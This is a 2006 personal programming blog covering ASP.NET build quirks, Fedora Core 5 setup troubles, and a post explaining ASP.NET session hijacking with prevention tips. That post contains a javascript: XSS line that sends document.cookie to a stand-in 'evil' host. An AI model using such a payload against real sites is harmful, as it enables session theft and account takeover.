03.29.06
Posted in Programming at by chenty
The past two weeks, I was continuing working the directory/search engine project. It was nothing new really, but I found two interesting things about .NET 2.0 and Visual Web Developer 2005 that I want to blog.
1. “\” or “/”:
In HTML, we would like to use “/” in url. I was using this for all my web applications. However, since I started using Visual Web Developer 2005 to develop .NET 2.0 applications, I noticed that there are always errors that complain cannot find path for user web controls. I did not pay much attention until I finally found it’s annoying to see these red underlines all the time. Therefore, I went on MSDN and tried to find out how other people define Prefix and Tag for user web controls. It looked like I was doing the right thing, but why the hell the stupid Visual Web Developer compiler kept complaining?
A couple of days ago, I found a sample code, and in that sample code, the path was in the format of “~\controls\abc.ascx” instead of “/controls/abc.ascx”. I quickly gave a try on my applications. To my surprise, it works. Now the compiler can compile my application. This only applies to VWD compiler. If you still love to use “/”, it is perfectly fine. I don’t have any difficulty to run my applications in either way.
2. aspnet_client:
We must include this folder in our ASP.NET 1.1 applications, otherwise server will complain when we use server side forms. Therefore, when I upgraded some of my legacy code from 1.1 to 2.0, I still kept that folder.
What my problem was, I kept getting some error that missing assemblies. I could not find out the exact error messages, but it was a page that complains some dynamic assemblies cannot be found. This error will show randomly, especially when I use a lot of user web controls. Today, after I modified my web application, this error spawned again after I uploaded the file. I was wondering why this happens after I uploaded? I decided to delete unused folder, and accidentally deleted aspnet_client folder.
Interestingly, after I removed aspnet_client folder, the problem is solved. Now the server can run the application flawlessly…
Conclusion: Oh, Microsoft!
Permalink
03.19.06
Posted in Programming at by chenty
can’t wait to try it. I hope it can solve many problems I had in FC5T3. I still couldn’t get my Flash Player working. I hope final version can fix it.
Permalink
03.14.06
Posted in Programming at by chenty
This article discusses several security issues related to ASP.NET Sessions while building the user login feature. It addresses several attacks such as session poisoning, XSS, etc. I assume readers have some experience with building user account with ASP.NET. This is not a tutorial on how to build user account function with ASP.NET.
1. The difference between cookies and ASP.NET sessions.
HTTP is stateless, which means server does not care who and where is sending HTTP request. Therefore, websites use cookies to track and record user activities and identities between clients and servers. I assume readers are quite knowledgeable about cookies. If not, here is a good article:
http://en.wikipedia.org/wiki/Http_cookie
Cookies are controversial mainly because it stores user information on client side. For example, if a website uses cookies to store user name and password for authentication, it is visible to hackers that have access to client’s file system. ASP.NET sessions (I will use “sessions” for short) serve in similar roles as cookies: it stores information to track clients. However, sessions do not store on client side but on servers. Sessions uses a session ID to communicate between clients and servers to identify clients. This session ID is stored as cookie on client side. Therefore, a hacker who has access to client computer cannot find out user’s user name and password by examining cookie data.
2. So sessions are secure?
Well, sessions are helpful to secure user name and password, but they are vulnerable to “session poisoning attack”, which is quite similar to “cookie poisoning”. You can find information on “cookie poisoning” in the same article I gave above. In “cookie poisoning”, hackers modify cookies and send back to server to pretend a legit user.
For example, a website use cookie [“userID”] to identify users. After a user login, the website assigns userID to cookie [“userID”], and stores it on client. In the future communication, the website checks if cookie [“userID”] has value. If cookie [“userID”] is not empty, then the server knows the user is logged in. This sounds quite logic, but what happens if a hacker modify cookie [“userID”] value on his client? Then he can BE ANY USER on that website! This may sound hard to achieve, but it is not really. Using tools such as Minibrowser, you can easily modify cookie values of current website you are browsing, and then refresh the request.
A hacker can do the exact the same thing to sessions. If you log in a website with Minibrowser, and examine cookies, you will see the cookie in this format:
ASP.NET_SessionId=jga11j55xc2wud25vgvqt0aw;path=/;HttpOnly
Now, copy this string, and open Minibrowser on another computer, go to the same website, open “cookies”, paste the above string, and press “Get”. Wow, you are already logged in as the user you previously logged in on another computer!!
You may now ask the question: but how can a hacker get access to my ASP.NET_SessionId? The good news is: this session ID is random, and it expires in a short time (20 minutes by default), and you will be issued a different session ID next time. This is much better than storing user information in cookies. However, the bad news is hackers can still get your session ID in certain ways without your acknowledgement. I will describe two ways here:
(1) Packet Sniffing: Hackers gather packets between client and server. Because HTTP is in ASCII format without encryption, a hacker can easily read your session ID. Here is what they can read in your HTTP:
GET /homepage.aspx HTTP/1.0
Accept: image/gif, */*
User-Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; DigExt)
Host: www.vulnerable.com
Cookie: ASP.NET_SessionId=jga11j55xc2wud25vgvqt0aw
See the last line? That is your session ID. ASP.NET server uses the same session ID to identify you until you close your browser. Therefore, if the hacker gets the session ID from your HTTP message, he can use “session poisoning” attack to act as you.
Prevention: Use SSL for all communication, then your HTTP message is not visible to hackers anymore.
(2) Cross-site scripting (XSS): Packet Sniffing may be hardcore for some amateur hackers, but XSS is much easier to employ. Even worse, SSL is not protecting you at all from XSS attack. To understand XSS, open a website on your favorite “Firefox” browser. I picked Firefox, because we all know “IE” sucks and “Firefox” means secure! Now type in the following in address bar:
Javascript:alert(My Session ID is: ” + document.cookie)
Magic! Now I just display your session ID. Well, it may not surprise you that much because you just see the same information in Minibrowser. However, what happened if I send you a link such as:
Javascript:document.location.replace(‘http://evil/submit_session.aspx?site=’+document.location+’&session=’+document.cookie)
Can you tell what the above address does? It submits your URL and session information to that website “evil”!
Prevention: IE 6.0+ hides session ID when using document.cookie. Therefore, the above code will not work. This is quite irony when people always think Firefox is more secure. It does (unless Microsoft release a new version of IE that disable ActiveX), but I think for securing session ID, IE wins the battle.
(To be continued)
Permalink
03.08.06
Posted in Information Technology (IT) at by chenty
100% wifi coverage for Downtown Toronto! Hurray!
Here is the news link: http://www.ctv.ca/servlet/ArticleNews/story/CTVNews/20060307/wifi_toronto_060307/20060307?hub=Canada
BUT
It right away comes in my mind: hey, how about security? I still remeber how easy you can crack down a WEP, and how easy a hacker can get in these business man’s computers in the same hotspot. And now, there will be a 100% coverage for the whole city under one operation.
All the emerging wifi security technology might be the answer, but will Toronto Hydro do the right thing? It will be interesting to watch how this story develops. 
Permalink
03.07.06
Posted in Programming at by chenty
In my previous post today, I said I had problem with installing mplayer on FC5 T3. The problem was: when I install from rpm or source, it says XFree86 is required for dependency. FC5 uses X.org instead of XFree86. I tried to install XFree86, but it totally crashed my X-window. After hours trying, I finally installed mplayer successfully. Here is how I did it:
Instead of using rpm -Uvh, I used yum. You will need Grey Sector Repository. You can find info on:
http://rpm.greysector.net/mplayer/yum.html
http://rpm.greysector.net/yum.html
I modified yum.conf and import PGP key. However, I need to change the script in yum.conf a little bit. There is a variable $releasever. If you are on FC5 T3, this value will be 4.92. There is no such directory. Therefore, I changed $releasever to “4″, so yum will install the package for FC4. Here is my modified script in /etc/yum.conf:
[greysector]
name=Grey Sector RPMs for Fedora Core 4 - $basearch
baseurl=http://rpm.greysector.net/yum/4/$basearch/
#mirrorlist=http://rpm.greysector.net/yum/mirrorlist-$releasever
gpgkey=http://rpm.greysector.net/greysector-pubkey.txt
enabled=1
[greysector-all]
name=Grey Sector RPMs for all Fedora Core releases - $basearch
baseurl=http://rpm.greysector.net/yum/all/$basearch/
#mirrorlist=http://rpm.greysector.net/yum/mirrorlist-all
gpgkey=http://rpm.greysector.net/greysector-pubkey.txt
enabled=1
I have tried this method on my computer and it works perfectly!
After I installed mplayer, I found no sound. Then I figured this is because I have 2 sound cards installed, and the first sound device is the one doesn’t work. I have set the second device as default, but mplayer didn’t recognize it. The solution is to go to prefences -> audio -> ALSA 0.9.x config. Change “driver default” to “default”. Now I am enjoying my MP3s.
=====================================
Too bad I still can’t make my Flash Player display fonts… I said it doesn’t display Chinese, but it actually doesn’t display any text in menus and dialogs in Flash Player at the moment. FC5 moves locations for fonts, and I read that Flash Player for Linux hard code the position for fonts…. Therefore, it doesn’t find font for display. How dumb! I hope I can find solution soon.
Permalink
03.06.06
Posted in Programming, Life at by chenty
Life in the past two weeks was quite boring. I didn’t find anything worthwhile that I want to blog about. This may be caused by my recent bad experience. I am still in trouble with my traffic tickets and have to pay big money on tuning up my car for road and getting car insurance. Moreover, the graduate school application isn’t going well. No professors that I wrote to have replied me. 
It seems that I probably will be end up in Commerce undergraduate program instead of Engineering grad school. However, I don’t think this situation will knock me down. In contrast, I feel a lot of energy to conduct research on my own now. I have gathered several computers in the basement, and I may start a small lab to do some work on distributed systems and operating systems. I believe I am a born fighter.
I have spent a lot of time to play with new Fedora Core tests (FC5 Test3) and I am really impressed by all the improvements. I have been using Redhat Linux since RH7, so my Linux experience isn’t long compared to these crazy script kids , but I have really seen the improvement each time a major Fedora release. The graphics for both GNOME and KDE is FC5 are very good (but honestly I think Windows Vista still beats Fedora), and the bundle packages are quite stable now. OpenOffice, Firefox, Thunderbird, GIMP, GAIM and some other small apps can pretty much fit all my needs. I like FC5 in general, even though it cannot replace my Windows XP Pro.
“Linux is created for hackers by hackers”, so no matter how good it is, it is not for end user. Even though FC5 is quite stable and provides a lot of apps and features, I still have some problems in the past few days:
1. My new sound card, Creative Audigy SE, which uses ca0106 chipset, isn’t supported by ALSA 1.0.10 (current stable release). I think the card can work with 1.0.11rc2 or later, so I am trying to recompile the kernel with 1.0.11rc3. If this fails, I guess I have to wait for 1.0.11 to be released. For now, I am using an old Yamaha sound card that is at least 6 or 7 years old.
2. I can’t install mplayer in FC5 because the dependency check failed due to missing XFree86… Since FC2, XFree86 is replaced by X.org, but I have no problem to install mplayer before (it was fine with FC4). I tried to install XFree86 4.5.0, but I failed miserably and totally screwed up X-window system… I had to reinstalled FC5 twice. Anyway, I am not gonna give up, and I will keep trying. Too bad I didn’t find any thread on this issue in forums yet.
3. Because I don’t have mplayer, I am using RealPlayer 10 right now. In plain language, it sucks. It cannot play .rm file properly. It runs like my computer with a Pentium II processor… no idea why…
4. My Flash plug-in doesn’t display Chinese anymore. It was, but not sure why it is not working anymore…
This is not a Linux complaint post, because these are not problems at all for skilled Linux users. So don’t flame me or anything. I love Linux because it creates a lot of problems, and after nights and nights research, I solve the problems. This is a great way to learn new skills, and maybe this is why all kido who uses Linux bashing Microsoft all the time.
================================
I felt my above post is totally useless, so I will contribute a good link at the end:
http://www.mjmwired.net/resources/mjm-fedora-fc5.html
This is a “Personal Fedora Core 5 Installation Guide” by Mauriat Miranda. It addresses many problems that people may counter during installation and setup FC5. (too bad it does not address any of problems that I had)
Permalink
